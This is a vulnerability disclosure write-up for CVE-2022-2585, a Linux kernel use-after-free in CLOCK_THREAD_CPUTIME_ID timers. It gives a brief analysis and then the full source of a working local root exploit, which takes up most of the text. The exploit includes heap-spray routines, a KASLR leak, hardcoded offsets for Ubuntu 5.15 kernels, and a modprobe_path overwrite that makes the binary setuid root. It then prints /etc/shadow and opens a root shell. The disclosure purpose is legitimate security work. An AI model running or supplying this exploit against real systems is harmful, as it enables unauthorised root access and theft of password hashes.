TL;DR
A vulnerability in the way the Linux kernel handles CLOCK_THREAD_CPUTIME_ID timers allows local attackers to trigger a use-after-free on an armed timer and, by winning a race against its expiry, elevate their privileges to root.
Vulnerability Summary
A use-after-free in the way CLOCK_THREAD_CPUTIME_ID timers are handled allows local users to keep a freed timer object linked in a kernel list, giving them control over the memory the kernel later operates on, which they can leverage to elevate their privileges to root.
Credit
An independent security researcher has reported this to the SSD Secure Disclosure program during the TyphoonPWN 2022 event.
CVE
CVE-2022-2585
Vendor Response
The Linux Kernel team has released a patch to address this vulnerability: https://seclists.org/oss-sec/2022/q3/116
Vulnerability Analysis
The CLOCK_THREAD_CPUTIME_ID bug lies in the POSIX CPU timer component of the Linux kernel.
A CLOCK_THREAD_CPUTIME_ID timer measures the amount of CPU time consumed by a thread. Once timer_settime is called on such a timer, the timer is “armed”. The timer then fires (by sending the program a signal) after the thread has consumed a user-specified amount of CPU time. This feature is useful if a program wants to do something after a specific thread has consumed a specific amount of CPU time.
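For concreteness, here is a minimal, self-contained sketch of the userspace side of this API (standard POSIX timer calls; link with -lrt on older glibc):

#define _GNU_SOURCE
#include <signal.h>
#include <time.h>
#include <unistd.h>

static void on_timer(int sig)
{
    // async-signal-safe: report and leave
    write(1, "timer fired\n", 12);
    _exit(0);
}

int main(void)
{
    timer_t timerid;
    signal(SIGALRM, on_timer);

    // with a NULL sigevent, expiry is delivered as SIGALRM to the process
    timer_create(CLOCK_THREAD_CPUTIME_ID, NULL, &timerid);

    // arm it: fire once the calling thread has consumed 1s of CPU time
    struct itimerspec its = { .it_value = { .tv_sec = 1 } };
    timer_settime(timerid, 0, &its, NULL);

    for(;;); // burn CPU time; sleeping would not advance this clock
}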
The Linux kernel implements this feature by linking the timer-associated struct k_itimer data structure into a doubly-linked list in struct posix_cputimers. Every time a timer interrupt is raised, a call chain like check_thread_timers->collect_posix_cputimers->collect_timerqueue is invoked. It checks whether the thread has consumed enough CPU time: if so, the timer “expires” (fires) and is added to a firing linked list. All the timers on the firing list are then processed, invoking posix_timer_event, which eventually sends signals to the program.
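A condensed paraphrase of that kernel path may help (based on kernel/time/posix-cpu-timers.c around v5.15; locking, the expiry-cache bookkeeping, and exact signatures are elided, so treat this as a sketch rather than the verbatim source):

/* Sketch of collect_timerqueue() (kernel/time/posix-cpu-timers.c, ~v5.15).
 * "head" is the queue hanging off struct posix_cputimers; "firing" is the
 * on-stack list that the caller later walks to send signals. */
static void collect_timerqueue(struct timerqueue_head *head,
                               struct list_head *firing, u64 now)
{
    struct timerqueue_node *next;

    while ((next = timerqueue_getnext(head))) {
        struct cpu_timer *ctmr = container_of(next, struct cpu_timer, node);

        if (now < ctmr->node.expires)
            break;                            /* not enough CPU time yet */

        ctmr->firing = 1;                     /* mark the timer as firing */
        cpu_timer_dequeue(ctmr);              /* unlink it from the queue */
        list_add_tail(&ctmr->elist, firing);  /* queue it for delivery */
    }
}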
Currently, in the Linux kernel, when a thread creates a thread CPU timer and then calls execve, the kernel tries to clean up all the timers on behalf of the process using exit_itimers(me->signal);. This frees all the timers associated with the process. However, it forgets to clean up the references in struct posix_cputimers.
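The cleanup happens on the exec path; a heavily elided sketch of the pre-patch code (the call site is begin_new_exec() in fs/exec.c on the affected 5.15 kernels, to the best of my reading):

/* fs/exec.c (pre-patch), heavily elided sketch */
int begin_new_exec(struct linux_binprm *bprm)
{
    struct task_struct *me = current;
    /* ... */
    exit_itimers(me->signal);   /* kfree()s every struct k_itimer of the
                                 * process, but any armed cpu_timer node
                                 * stays linked in posix_cputimers */
    /* ... */
}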
In other words, if the timer is armed before execve, the kernel frees the timer object while keeping a reference to it in the doubly-linked timer list. When the expiry time arrives, the kernel walks the linked list, finds the stale timer, adds it to the firing list, and tries to trigger it, which causes a use-after-free.
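Distilled from the trigger_free() routine in the exploit below, a minimal reproducer looks roughly like this (on a vulnerable kernel the freed k_itimer is dereferenced about three seconds after the execve; the /bin/sh busy loop keeps the thread consuming CPU time so the stale timer actually expires):

#define _GNU_SOURCE
#include <assert.h>
#include <time.h>
#include <unistd.h>

int main(int argc, char **argv, char **envp)
{
    timer_t timerid;

    // create and arm a thread CPU-time timer...
    assert(timer_create(CLOCK_THREAD_CPUTIME_ID, NULL, &timerid) == 0);
    struct timespec ts = { .tv_sec = 3, .tv_nsec = 0 };
    struct itimerspec its = { .it_interval = ts, .it_value = ts };
    assert(timer_settime(timerid, 0, &its, NULL) == 0);

    // ...then execve: exit_itimers() frees the k_itimer but its node stays
    // queued in posix_cputimers; the new image burns CPU until it "fires"
    char *args[] = { "/bin/sh", "-c", "while :; do :; done", NULL };
    execve("/bin/sh", args, envp);
    return 1;
}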
Exploit
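The full exploit is reproduced below. It consists of the main exploit program and a small helper library it links against; the library's header is libexp.h (included by both files), and its implementation (presumably libexp.c) follows the main program.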
#define _GNU_SOURCE
#include <endian.h>
#include <errno.h>
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <time.h>
#include <fcntl.h>
#include <unistd.h>
#include <assert.h>
#include <poll.h>
#include <sys/ioctl.h>
#include <sys/resource.h>
#include <sys/msg.h>
#include <net/if.h>
#include <netinet/ip.h>
#include <sys/wait.h>
#include <sys/shm.h>
#include <sys/utsname.h>
#include "libexp.h"

#define SPRAY_NUM1 100
#define SPRAY_NUM2 350
#define SPRAY_NUM3 200
#define PIPE_SPRAY_NUM 0x600
#define M_TS_LEN 0x1000
#define LEAK_SPRAY_NUM 0x1000
#define SHM_SPRAY_NUM 0x400
#define PAGE_SPRAY_NUM 0x100
#define def_kbase 0xffffffff81000000

struct config {
    char *release;
    u64 init_ipc_ns;
    u64 modprobe_path;
};

struct config configs[] = {
    {
        .release = "5.15.0-37-generic",
        .init_ipc_ns = 0xffffffff830824c0,
        .modprobe_path = 0xffffffff82e8b560
    },
    {
        .release = "5.15.0-39-generic",
        .init_ipc_ns = 0xffffffff83082580,
        .modprobe_path = 0xffffffff82e8b620
    },
    {
        .release = "5.15.0-40-generic",
        .init_ipc_ns = 0xffffffff83082580,
        .modprobe_path = 0xffffffff82e8b620
    }
};

int fd = 0;
int val = 0;
int *stage = &val;
int shm_fd = -1;
int *shm_stage;
timer_t timerids1[SPRAY_NUM1];
timer_t timerids2[SPRAY_NUM2];
timer_t timerids3[SPRAY_NUM3];
int pipe_fds[PIPE_SPRAY_NUM][2];
u64 kernel_base = 0;
u64 kaslr_slide = 0;
u64 kptr_vtable = 0;
u64 uptr_vtable = 0;
u64 msg_addr = 0;
u64 kbuf_addr = 0;
u64 ubuf_addr = 0;
char path[0x800];
u64 CPUID = 0;
u64 page_size = 0x1000;
char cpuid_env[0x20];
u64 init_ipc_ns = 0;
u64 modprobe_path = 0;

void *trigger_free(void *env_str)
{
    timer_t timerid;
    int ret = timer_create(CLOCK_THREAD_CPUTIME_ID, NULL, &timerid);
    assert(ret == 0);

    *stage = 1;
    while(*stage != 2);

    struct timespec tspec = {.tv_sec = 3, .tv_nsec = 0};
    struct itimerspec ispec = { .it_interval = tspec, .it_value = tspec};
    timer_settime(timerid, 0, &ispec, NULL);

    // getchar();
    // fd = memfd_create("exp", 0);
    // assert(fd >= 0);

    char *argv[] = {path, NULL};
    char *env[] = {env_str, cpuid_env, NULL};
    execve(path, argv, env);
    return NULL;
}

void spray_timer(timer_t *tids, u32 num)
{
    for(int i=0; i<num; i++)
        timer_create(CLOCK_THREAD_CPUTIME_ID, NULL, &tids[i]);
}

void release_timer(timer_t *tids, u32 num, u32 jump)
{
    for(int i=0; i<num; i+=jump)
        timer_delete(tids[i]);
}

void leak_func()
{
    pthread_t tid;

    ts_fence();
    spray_timer(timerids1, SPRAY_NUM1);
    pthread_create(&tid, NULL, trigger_free, (void *)"LEAK=1");
    while(*stage != 1);
    spray_timer(timerids2, SPRAY_NUM2);
    spray_timer(timerids3, SPRAY_NUM3);
    release_timer(timerids1, SPRAY_NUM1, 1);
    release_timer(timerids2, SPRAY_NUM2, 1);
    release_timer(timerids3, SPRAY_NUM3, 2);

    //puts("Done");
    //int c = getchar();
    //printf("c : %#x\n", c);
    //defragment(0x100, 0x1000);
    usleep(100*1000);
    *stage = 2;
    while(1);
}

void exp_func()
{
    pthread_t tid;

    ts_fence();
    spray_timer(timerids1, SPRAY_NUM1);
    pthread_create(&tid, NULL, trigger_free, (void *)"EXP=1");
    while(*stage != 1);
    spray_timer(timerids2, SPRAY_NUM2);
    spray_timer(timerids3, SPRAY_NUM3);
    release_timer(timerids1, SPRAY_NUM1, 1);
    release_timer(timerids2, SPRAY_NUM2, 1);
    release_timer(timerids3, SPRAY_NUM3, 2);
    usleep(100*1000);
    *stage = 2;
    while(1);
}

void leak_child_func()
{
    usleep(1000*100);
    // tell the parent process that the slab page is freed
    *shm_stage = 1;
    // wait for the parent process to reclaim the page
    while(*shm_stage != 2);
    // trigger unlink by exiting the process (in fact, the unlink happens in wait)
    puts("[!] Now trigger unlink in the child process!");
    exit(0);
}

void exp_child_func()
{
    usleep(1000*100);
    // tell the parent process that the slab page is freed
    *shm_stage = 1;
    // cannot sleep here or the timer will not be invoked
    // to avoid wasting CPU time (and to increase the critical window), let's move to another CPU
    set_cpu(CPUID);
    while(1);
}

int search_msgqid()
{
    int msgqid;
    struct msqid_ds ds;
    struct msginfo msginfo;
    int maxind = msgctl(0, MSG_INFO, (struct msqid_ds *) &msginfo);
    assert(maxind >= 0);

    char buffer[0x2000];
    int target_msgqid = -1;
    // printf("check %d msgs\n", maxind);
    for(int i=0; i<maxind; i++) {
        int ret;
        msgqid = msgctl(i, MSG_STAT, &ds);
        assert(msgqid >= 0);
        for(int j=0; j<ds.msg_qnum; j++) {
            ret = msgrcv(msgqid, buffer, sizeof(buffer), 0, MSG_NOERROR | IPC_NOWAIT | MSG_COPY);
            assert(ret >= 0);
            if(ret >= 0x1000 && !memcmp(buffer, "AAAAAAAA", 8)) {
                target_msgqid = msgqid;
                // hex_print(buffer, 0x100);
                break;
            }
            msgrcv(msgqid, buffer, sizeof(buffer), 0, MSG_NOERROR | IPC_NOWAIT);
            if(j == ds.msg_qnum-1) {
                int ret = msgctl(msgqid, IPC_RMID, 0);
                assert(ret == 0);
            }
        }
    }
    return target_msgqid;
}

void increase_limit()
{
    int ret;
    struct rlimit open_file_limit;
    /* Query current soft/hard value */
    ret = getrlimit(RLIMIT_NOFILE, &open_file_limit);
    assert(ret >= 0);
    /* Set soft limit to hard limit */
    open_file_limit.rlim_cur = open_file_limit.rlim_max;
    ret = setrlimit(RLIMIT_NOFILE, &open_file_limit);
    assert(ret >= 0);
}

u64 leak_kbuf_addr()
{
    timer_t defrag_timers[0x400];
    spray_timer(defrag_timers, 0x400);

    // trigger UAF first
    if(!fork()) {
        set_cpu(CPUID);
        leak_func();
        // this function will call execve, so no return
        while(1);
    }

    // wait for the slab page to be freed
    while(*shm_stage != 1);

    // do page spray
    void *addr = umem_alloc(NULL, page_size);
    int s = pg_vec_spray(addr, page_size, PAGE_SPRAY_NUM);
    *shm_stage = 2;

    // wait for the unlink to happen
    wait(NULL);

    // now we should have the heap leak!
    void *addr2 = mmap(NULL, page_size*PAGE_SPRAY_NUM, PROT_READ|PROT_WRITE, MAP_SHARED, s, 0);
    assert((u64)addr2 != -1);
    u64 heap_addr = 0;
    int idx = 0;
    while(!heap_addr && idx < 0x10*100) {
        u64 *obj_ptr = (u64 *)(addr2 + idx*0x100);
        if(obj_ptr[15] != 0) {
            heap_addr = obj_ptr[15] - 0x78;
            ubuf_addr = (u64)(obj_ptr) & 0xfffffffffffff000;
            break;
        }
        idx += 1;
    }
    if(!heap_addr) {
        puts("[-] leak kbuf_addr failed (but it's OK)");
        // clean up
        munmap(addr2, page_size*PAGE_SPRAY_NUM);
        close(s);
        return 0;
    }
    return heap_addr & 0xfffffffffffff000;
}

u64 leak_msg_addr()
{
    int msgqids[LEAK_SPRAY_NUM];
    // allocate msgq first, it is also in kmalloc-256
    for(int i=0; i<LEAK_SPRAY_NUM; i++) {
        msgqids[i] = msgget(IPC_PRIVATE, 0644 | IPC_CREAT);
    }

    char buf[0xd0];
    memset(buf, 0, sizeof(buf));
    memset(&buf[0xb0], 'A', 0x20);
    memset(buf, 'A', 8);

    timer_t defrag_timers[0x100];
    spray_timer(defrag_timers, 0x100);

    // trigger UAF first
    if(!fork()) {
        set_cpu(CPUID);
        leak_func();
        // this function will call execve, so no return
        while(1);
    }

    // wait for the slab page to be freed
    while(*shm_stage != 1);

    // do page spray
    void *addr = umem_alloc(NULL, page_size);
    int s = pg_vec_spray(addr, page_size, PAGE_SPRAY_NUM);
    *shm_stage = 2;

    // wait for the unlink to happen
    wait(NULL);

    // now we should have the heap leak!
    void *addr2 = mmap(NULL, page_size*PAGE_SPRAY_NUM, PROT_READ|PROT_WRITE, MAP_SHARED, s, 0);
    assert((u64)addr2 != -1);
    u64 heap_addr = 0;
    int idx = 0;
    while(!heap_addr && idx < page_size*PAGE_SPRAY_NUM/0x100) {
        u64 *obj_ptr = (u64 *)(addr2 + idx*0x100);
        if(obj_ptr[15] != 0) {
            heap_addr = obj_ptr[15] - 0x78;
            break;
        }
        idx += 1;
    }
    if(!heap_addr) {
        puts("[-] leak msg_addr failed (but it's OK)");
        // clean up
        munmap(addr2, page_size*PAGE_SPRAY_NUM);
        close(s);
        return 0;
    }

    // now try to free the page!
    munmap(addr2, page_size*PAGE_SPRAY_NUM);
    close(s);
    for(int i=0; i<LEAK_SPRAY_NUM; i++) {
        for(int j=0; j<4; j++)
            msgsnd(msgqids[i], buf, sizeof(buf)-8, IPC_NOWAIT);
    }
    return (heap_addr&0xfffffffffffff000) + 0x100;
}

void get_root()
{
    set_cpu(CPUID+1);
    int fd = open("/proc/sys/kernel/modprobe", 0);
    char buf[0x100];
    while(1) {
        lseek(fd, 0, SEEK_SET);
        read(fd, buf, sizeof(buf));
        if(!strncmp(buf, "//tmp/modprobe", 14))
            break;
        sleep(1);
    }
    puts("[+] Payload is written! /proc/sys/kernel/modprobe now points to /tmp/modprobe!");
    system("echo 1 > /tmp/1; chmod +x /tmp/1; /tmp/1 2> /dev/null");
    char *argv[] = {path, NULL};
    char *env[] = {cpuid_env, NULL};
    execve(path, argv, env);
}

void context_setup()
{
    // handle CPUID
    char *id_str = getenv("CPUID");
    if(id_str)
        CPUID = atoi(id_str);
    else
        CPUID = cpu_num - 2;
    int ret = sprintf(cpuid_env, "CPUID=%lld", CPUID);
    assert(ret > 0);

    // handle page_size
    if(cpu_num >= 8)
        page_size = 0x2000;
    else
        page_size = 0x1000;
}

void prep_shm()
{
    shm_fd = open("/tmp/shm", O_RDWR|O_CREAT, 0666);
    ftruncate(shm_fd, 4);
    shm_stage = (int *)mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, shm_fd, 0);
    *shm_stage = 0;
}

void check_root()
{
    // if we are root
    if(open("/etc/shadow", 0) >= 0) {
        setuid(0);
        system("head -n 10 /etc/shadow");
        system("/bin/bash");
        exit(0);
    }
    // or if we can be root
    int tmp_fd = open("/proc/sys/kernel/modprobe", 0);
    char buf[0x2000];
    memset(buf, 0, sizeof(buf));
    read(tmp_fd, buf, sizeof(buf));
    if(!strncmp(buf, "//tmp/modprobe", 14)) {
        sprintf(buf, "echo '#!/bin/bash\nchown root:root %s; chmod 04755 %s' > /tmp/modprobe; chmod +x /tmp/modprobe", path, path);
        system(buf);
        system("echo 1 > /tmp/1; chmod +x /tmp/1; /tmp/1 2> /dev/null");
        char *argv[] = {path, NULL};
        char *env[] = {cpuid_env, NULL};
        execve(path, argv, env);
    }
}

void setup_offsets(char *release)
{
    for(int i=0; i<sizeof(configs)/sizeof(configs[0]); i++) {
        if(!strcmp(configs[i].release, release)) {
            init_ipc_ns = configs[i].init_ipc_ns;
            modprobe_path = configs[i].modprobe_path;
            break;
        }
    }
    assert(init_ipc_ns != 0);
    assert(modprobe_path != 0);
}

int main(int argc, char **argv)
{
    context_setup();
    set_cpu(CPUID);
    increase_limit();

    // save absolute path for later use
    if(argc && argv[0] && argv[0][0])
        assert(realpath(argv[0], path) != NULL);

    // trigger the UAF timer when trying to leak heap address
    if(getenv("LEAK")) {
        set_cpu(CPUID);
        prep_shm();
        leak_child_func();
        exit(0);
    }

    // trigger the UAF timer when trying to perform exploitation
    if(getenv("EXP")) {
        set_cpu(CPUID);
        prep_shm();
        exp_child_func();
        exit(0);
    }

    // in case we already are/can be root
    check_root();

    // first thing first, before we get into a namespace
    // we launch a process that waits for root
    if(!clean_fork()) {
        get_root();
        sleep(10000);
    }

    struct utsname uname_buf;
    assert(uname(&uname_buf) == 0);
    printf("CPUID: %lld\n", CPUID);
    printf("page_size: %#llx\n", page_size);
    printf("release: %s\n", uname_buf.release);
    setup_offsets((char *)&uname_buf.release);

    prep_shm();
    setup_sandbox();
    setup_pg_vec();

    // step 1: leak kbuf_addr
    puts("[*] try to leak kernel buffer addr");
    while(!kbuf_addr) {
        cleanup_msgs();
        usleep(100000);
        kbuf_addr = leak_kbuf_addr();
    }
    printf("[+] kbuf_addr: %#llx\n", kbuf_addr);
    printf("[+] ubuf_addr: %#llx\n", ubuf_addr);
    assert(kbuf_addr != 0);
    assert(ubuf_addr != 0);
    *(u64 *)ubuf_addr = 0x4141414141414141;

    // reset shm_stage for orchestration
    *shm_stage = 0;

    // step 2: leak msg_msg addr
    puts("[*] try to leak msg_msg addr");
    while(!msg_addr) {
        cleanup_msgs();
        usleep(100000);
        msg_addr = leak_msg_addr();
    }
    printf("[+] msg_msg addr: %#llx\n", msg_addr);
    assert(msg_addr != 0);

    // reset shm_stage for orchestration
    *shm_stage = 0;

    // step 3: trigger the vulnerability again and reclaim the page
    // trigger UAF
    if(!fork()) {
        set_cpu(CPUID);
        exp_func();
        // this function will call execve, so no return
        while(1);
    }

    // wait for the slab page to be freed
    while(*shm_stage != 1);

    // do page spray, the payload is used for trapping CPU0 in an infinite loop so we can
    // later modify the memory from CPU1
    void *addr = umem_alloc(NULL, page_size);
    *(u64 *)(ubuf_addr+0x130) = kbuf_addr+0x120;
    for(int i=0; i<page_size/0x100; i++) {
        u64 *obj_ptr = (u64 *)(addr-0x40+-2+i*0x100);
        obj_ptr[10] = M_TS_LEN; // timer->it_requeue_pending
        obj_ptr[11] = 0x000000012a05f200;
        obj_ptr[14] = msg_addr-0x20; // timer->sigq
        obj_ptr[16] = kbuf_addr + 0x120;
        obj_ptr[17] = kbuf_addr + 0x100;
        obj_ptr[18] = 0x000000012a061742;
        obj_ptr[19] = kbuf_addr; // head
    }
    int s = pg_vec_spray(addr, page_size, PAGE_SPRAY_NUM);
    *shm_stage = 2;

    // now, wait for the timer to get triggered.
    // when it is triggered, timer->firing will become 1, then we know where the timer
    // is in the buffer and that CPU0 is halted
    set_cpu(CPUID+1); // switch to CPU1 because CPU0 will hang
    void *addr2 = mmap(NULL, page_size*PAGE_SPRAY_NUM, PROT_READ|PROT_WRITE, MAP_SHARED, s, 0);
    u64 *timer_ptr = NULL;
    while(!timer_ptr) {
        int idx = 0;
        while(idx < page_size*PAGE_SPRAY_NUM/0x100) {
            u64 *obj_ptr = (u64 *)(addr2 + idx*0x100);
            // if(idx % 0x10==0)printf("a: %p\n", obj_ptr);
            if(obj_ptr[23] == 1) { // tmr.firing == 1
                timer_ptr = obj_ptr;
                break;
            }
            idx++;
        }
    }

    // now we know tmr->firing is set, CPU0 is going to be trapped very soon
    // let's waste a few cycles to ensure that
    read(-1, NULL, 0);

    // now we are sure CPU0 is trapped =>
    // 1. clear out the timer's first part to avoid locking issues
    // 2. modify the timer so it won't be added to the firing list again immediately, but will be triggered in 2 seconds
    // 3. release CPU0 by making it think it reaches a leaf node
    memset(timer_ptr, 0, 0x50);
    timer_ptr[18] = 0x000000012a061742*2;
    *(u64 *)(ubuf_addr + 0x130) = 0;

    // now we are back to CPU0! so we spray in the per-CPU cache!
    set_cpu(CPUID);
    printf("[+] timer_ptr: %p\n", timer_ptr);

    // at this moment, we have a msg_msg with an enlarged m_ts, let's find it!
    puts("[*] Looking for the victim msg_msg...");
    int msgqid = search_msgqid();
    assert(msgqid >= 0);
    printf("[+] Found it! msgqid: %d\n", msgqid);

    // alright, let's spray tons of shmid to leak kaslr
    int shmids[SHM_SPRAY_NUM];
    char buffer[0x2000];
    memset(buffer, 0, sizeof(buffer));
    for(int i=0; i<SHM_SPRAY_NUM; i++)
        shmids[i] = shmget(IPC_PRIVATE, 1, 0600);
    int ret = msgrcv(msgqid, buffer, sizeof(buffer), 0, MSG_NOERROR | IPC_NOWAIT | MSG_COPY);
    assert(ret >= 0);

    // search for shmid, we can't be so unlucky that there is no shmid_kernel in the PAGE?
    for(int i=0; i<(page_size/0x100)-2; i++) {
        u64 *obj_ptr = (u64 *)(buffer + 0xd0 + i*0x100);
        u64 val = obj_ptr[29]; // shmid_kernel->ns, should be init_ipc_ns
        if(((val-init_ipc_ns) & 0xfff) == 0) {
            kaslr_slide = val - init_ipc_ns;
            kernel_base = kaslr_slide + def_kbase;
            break;
        }
    }
    printf("[+] kernel_base: %#llx\n", kernel_base);
    printf("[+] kaslr_slide: %#llx\n", kaslr_slide);
    if(kernel_base == 0) {
        hex_print(buffer, sizeof(buffer));
        timer_ptr[18] = 0xffffffffffff; // disarm timer to avoid crash
        getchar();
        exit(0);
    }
    assert(kernel_base != 0);

    // now we have the KASLR leak and the timer will be triggered again in a few seconds
    // let's prepare the timer
    *(u64 *)(ubuf_addr+0x130) = kbuf_addr+0x120;
    timer_ptr[10] = 0x706d742f-1; // timer->it_requeue_pending => /tmp
    timer_ptr[11] = 0x000000012a05f200;
    timer_ptr[14] = kaslr_slide + modprobe_path - 0x38 + 1; // overwrite modprobe_path+1 with /tmp => /sbin/modprobe becomes //tmp/modprobe
    timer_ptr[15] = 0;
    timer_ptr[16] = kbuf_addr + 0x120;
    timer_ptr[17] = kbuf_addr + 0x100;
    timer_ptr[18] = 0x000000012a061742*2;
    timer_ptr[19] = kbuf_addr; // head

    // switch to CPU1 again because we know CPU0 will be trapped again in a few seconds
    set_cpu(CPUID+1);

    // now wait for CPU0 to get trapped
    timer_ptr[23] = 0; // tmr->firing = 0
    while(!timer_ptr[23]); // wait for firing to be set
    read(-1, NULL, 0); // waste a few cycles to ensure CPU0 is trapped

    // 1. make sure the timer will not be triggered again by setting a huge expire value
    // 2. resume its execution, write a heap pointer before modprobe_path so that send_sigqueue will not panic
    timer_ptr[18] = 0xffffffffffff;
    *(u64 *)(ubuf_addr + 0x130) = kaslr_slide + modprobe_path - 0x30 - 6;

    // prepare payload
    puts("[*] Waiting for payload to be written into '/proc/sys/kernel/modprobe'...");
    sprintf(buffer, "echo '#!/bin/bash\nchown root:root %s; chmod 04755 %s' > /tmp/modprobe; chmod +x /tmp/modprobe", path, path);
    system(buffer);

    // now wait for the get_root subprocess to wake up and launch a root shell
    wait(NULL);
    return 0;
}
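Next comes the helper library implementation (presumably libexp.c):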
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdarg.h>
#include <sched.h>
#include <time.h>
#include <poll.h>
#include <signal.h>
#include <keyutils.h>
#include <pthread.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/mman.h>
#include <sys/prctl.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <linux/userfaultfd.h>
#include <arpa/inet.h>
#include <x86intrin.h>
#include <linux/if_packet.h>
#include <net/ethernet.h>
#include <net/if.h>
#include <netinet/ip.h>
#include "libexp.h"

struct fault_struct {
    int uffd;
    struct fault_struct *next;
    void *addr;
    size_t len;
    void *src_page;
    void (*hook)(void *);
};

static u64 min_cpu_freq;
static u64 min_granularity;
static u64 min_slice_tsc;
static u64 msgmnb;
static u64 mem_size;
static u64 optmem_max;
static int urand_fd;
u64 cpu_num;
struct cpu_info *idle_cpus;
cpu_set_t cpu_mask;
size_t kmalloc_size_array[13] = {0x8, 0x10, 0x20, 0x40, 0x60, 0x80, 0xc0, 0x100, 0x200, 0x400, 0x800, 0x1000, 0x2000};

#define DEBUG 0
#define dprintf(...) if(DEBUG) printf(__VA_ARGS__)
#define PAGE_SHIFT 12
#define PAGE_SIZE (1 << PAGE_SHIFT)
#define PFN_MIN 0
#define CPU_FREQ_FILE "/sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_min_freq"
#define SCHED_GRAN_FILE "/proc/sys/kernel/sched_min_granularity_ns"
#define MSGMNB_FILE "/proc/sys/kernel/msgmnb"
#define CPU_INFO_FILE "/proc/cpuinfo"
#define MEM_INFO_FILE "/proc/meminfo"
#define OPTMEM_MAX_FILE "/proc/sys/net/core/optmem_max"
#define SCHED_DEBUG_FILE "/proc/sched_debug"
#define SUPPRESS_PROC_NUM 20
#define UNIV_SPRAY_FILE "/tmp/univ_spray_dummy"

void rand_str(char *dest, size_t length)
{
    char charset[] = "0123456789"
                     "abcdefghijklmnopqrstuvwxyz"
                     "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
    read(urand_fd, dest, length);
    for(int i=0; i<length; i++) {
        int idx = ((int)dest[i]) % (sizeof(charset)/sizeof(char) - 1);
        dest[i] = charset[idx];
    }
    dest[length] = '\0';
}

void hex_print(void *addr, size_t len)
{
    u64 tmp_addr = (u64)addr;
    puts("");
    for(u64 tmp_addr=(u64)addr; tmp_addr < (u64)addr + len; tmp_addr += 0x10) {
        printf("0x%016llx: 0x%016llx 0x%016llx\n", tmp_addr, *(u64 *)tmp_addr, *(u64 *)(tmp_addr+8));
    }
}

void error_out(const char *fmt, ...)
{
    char *buf;
    va_list ap;
    va_start(ap, fmt);
    if(vasprintf(&buf, fmt, ap) < 0) {
        perror("[error_out]");
        exit(-1);
    }
    va_end(ap);
    puts(buf);
    perror("[Reason] ");
    exit(-1);
}

static u64 _read_u64_from_file(const char *fname)
{
    FILE *f = fopen(fname, "r");
    long size = 0x100;
    char *buf = alloca(size+1);

    // read content
    if(f == NULL)
        error_out("fail to open %s", fname);
    if(fread(buf, 1, size, f) <= 0)
        error_out("fail to fread on %s", fname);
    buf[size] = 0;
    fclose(f);
    return atoll(buf);
}

static size_t kmalloc_size(size_t num)
{
    for(int i=0; i<sizeof(kmalloc_size_array)/sizeof(kmalloc_size_array[0]); i++) {
        size_t size = kmalloc_size_array[i];
        if(size > num)
            return size;
    }
    error_out("%ld is too large to fit in kmalloc", num);
}

static u64 _get_cpu_freq(void)
{
    // try to read from the sysfs file first
    if(access(CPU_FREQ_FILE, R_OK) == 0)
        return _read_u64_from_file(CPU_FREQ_FILE);

    // try to read from /proc/cpuinfo
    if(access(CPU_INFO_FILE, R_OK) == 0) {
        FILE *f = fopen(CPU_INFO_FILE, "r");
        char *line_buf = NULL;
        char *freq_buf;
        size_t n;
        // look for cpu MHz
        while(!feof(f)) {
            if(getline(&line_buf, &n, f) < 0) {
                free(line_buf);
                goto out;
            }
            if(strstr(line_buf, "cpu MHz"))
                break;
        }
        freq_buf = strstr(line_buf, ":");
        freq_buf += 1;
        double freq = atof(freq_buf) * 1000; // MHz to KHz
        return (u64)freq;
    }
out:
    error_out("fail to get cpu frequency");
    return -1;
}

static u64 _get_min_gran(void)
{
    // try to read from file first
    if(access(SCHED_GRAN_FILE, R_OK) == 0)
        return _read_u64_from_file(SCHED_GRAN_FILE);
    // return a commonly used default value
    return 3000000;
}

static u64 _get_cpu_num(void)
{
    return sysconf(_SC_NPROCESSORS_ONLN);
}

static u64 _get_mem_size(void)
{
    FILE *f = fopen(MEM_INFO_FILE, "r");
    char *line_buf = NULL;
    char *buf;
    size_t n;
    if(unlikely(f == NULL))
        error_out("fail to open /proc/meminfo");
    if(getline(&line_buf, &n, f) < 0) {
        free(line_buf);
        goto out;
    }
    buf = strstr(line_buf, ":") + 1;
    fclose(f);
    return atoll(buf) * 1024;
out:
    error_out("fail to read memory size");
    fclose(f);
    return -1;
}

static void busy_loop(void)
{
    while(1);
}

pid_t clean_fork(void)
{
    pid_t pid = fork();
    if(pid)
        return pid;
    if(prctl(PR_SET_PDEATHSIG, SIGKILL) < 0)
        error_out("fail to register DEATHSIG");
    return pid;
}

void anti_swapper(void (*hook)(void))
{
    for(int i=0; i<cpu_num; i++) {
        if(!clean_fork()) {
            set_cpu(i);
            if(hook)
                hook();
            busy_loop();
        }
    }
}

void suppress_int(void (*hook)(void))
{
    for(int i=0; i<cpu_num; i++) {
        // for each core spawn SUPPRESS_PROC_NUM dummy processes
        for(int j=0; j<SUPPRESS_PROC_NUM; j++) {
            if(!clean_fork()) {
                set_cpu(i);
                if(hook)
                    hook();
                busy_loop();
            }
        }
    }
}

void ts_fence(void)
{
    cpu_set_t my_set;

    // Step1: get current affinity mask
    if(sched_getaffinity(0, sizeof(my_set), &my_set))
        error_out("fail to get cpu affinity");

    // Step2: pin CPU to current CPU to avoid task migration and getting a wrong tsc
    set_cpu(sched_getcpu());

    // Step3: do context switch detection
    register u64 start = __rdtsc();
    register u64 prev = start;
    register u64 now = start;
    while(1) {
        now = __rdtsc();
        if(unlikely(now - prev > min_slice_tsc))
            break;
        if(unlikely(now - start > 5*min_slice_tsc)) {
            // puts("[Info] Have been waiting for a reschedule for too long, gonna yield and hope next time we get a new time slice");
            sched_yield();
            break;
        }
        prev = now;
    }

    // Step4: restore affinity mask
    if(sched_setaffinity(0, sizeof(my_set), &my_set))
        error_out("fail to set cpu affinity");
}

void set_cpu(int cpuid)
{
    cpu_set_t my_set;
    CPU_ZERO(&my_set);
    CPU_SET(cpuid, &my_set);
    if(sched_setaffinity(0, sizeof(my_set), &my_set) != 0)
        error_out("set cpu affinity at cpu: %d fails", cpuid);
}

